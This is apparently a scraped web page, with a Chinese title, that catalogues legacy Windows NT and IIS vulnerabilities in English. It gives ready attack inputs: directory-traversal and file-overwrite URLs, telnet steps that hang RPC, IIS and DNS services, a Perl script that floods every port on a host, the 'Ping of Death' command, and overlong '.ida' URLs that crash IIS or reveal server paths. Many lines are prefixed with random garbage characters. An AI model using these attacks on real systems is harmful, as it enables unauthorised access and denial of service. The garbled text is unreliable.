NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
! \' y" T1 Z7 m& I. W7 H3 zA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
% L) v) A* L( G& j3 i$ F
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
! W( Y+ g2 T  H! m! A  n( ~# Q( b
+ N9 @6 c& c' [/ D# r4 gBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

8 T# f& V1 s4 b& P( e受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

If the file 'target.bat' exists, the file will be truncated.


+ Y" A. N& c1 _) o4 _A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
9 Y; {4 D7 _% P0 Q% D
----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
; B& w) V- K/ JMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
) m8 ~. }3 f4 N' w( j  v. ~; o3 d
' a  M0 o/ K# m8 W/ hThe following steps;

Telnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
& c; g* E0 A& s9 c' r8 P  FExit Telnet
$ `2 z# O. A+ B( e! Aresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
+ y" b9 s3 B7 W3 U' R( X
, U' f2 O# M! L7 R# A* QWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

+ n6 d+ }7 _7 p* O% G: ~3 {7 NThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

+ g; s" K! ~9 J9 `, o1 U" |4 `If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is modified perl script gleaned from postings in the [email protected] list to test ports on your system (Perl is available from the NT resource kit):
* Q9 Y* L# i! _1 q, |( {6 b8 Z$ q
! K  e) x- j4 M/ \/*begin poke code*/

use Socket;
& @1 N( C6 F/ u# G) Z/ yuse FileHandle;
9 i* \4 |6 d; ~7 I& O% Vrequire "chat2.pl";

$ b3 U% ~( k1 I3 t5 `$systemname = $ARGV[0] && shift;
$ \9 i) s" \2 h! k; K3 l
$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
' D9 a, o" q" @! E, L' @6 Ffor ($port = $0; $port<65535; $port++)
$ I7 f( c0 G' k. `1 U! c( L' g3 M{
& \  g; h# c8 |3 a& i4 v
: H- ]; j2 \- g: y; i& S
( u" C. _9 `+ u$ Nif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
next;
. G* l" [* m$ E4 d: _}
$fh = chat::open_port($systemname, $port);
( x  V+ J' E5 m' M8 `: uchat::print ($fh,"This is about ten characters or more");
$ n9 ~3 X' B/ o( I& j) ]3 ?% t: dif ($verbose) {
print "Trying port: $port\n";
}
6 V; W. {, R" nchat::close($fh);

, `* C1 g; k/ H* B; ?1 R2 Z$ f}


/*end poke code*/

# A$ f6 g- a9 \3 G+ ~# z+ ASave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

) ^/ F( M4 @- i( c--------------------------------------------------------------------------------
( t* J0 e$ c; q2 v+ L$ ^, d
受影響系統(tǒng):4.0
* Y2 E, X2 c9 |( ^- p, I2 N: s  uUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

8 \. a% m4 E1 K5 Z- FThis attack causes Dr. Watson to display an alert window and to log an error:

3 z9 L5 }0 z5 i"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
& p0 h) s. r6 W# J
--------------------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
+ G/ i$ c  Q  i9 ?- T, n7 ]Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:

% b' {" p( D- b- BSTOP: 0X0000001E
- ?% C9 p+ y! W" S7 YKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

- {) b5 z  w0 e% ^! [$ j-OR-
, |, S: `- ^$ Y
STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

' V6 p* D- I( y--------------------------------------------------------------------------------

Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server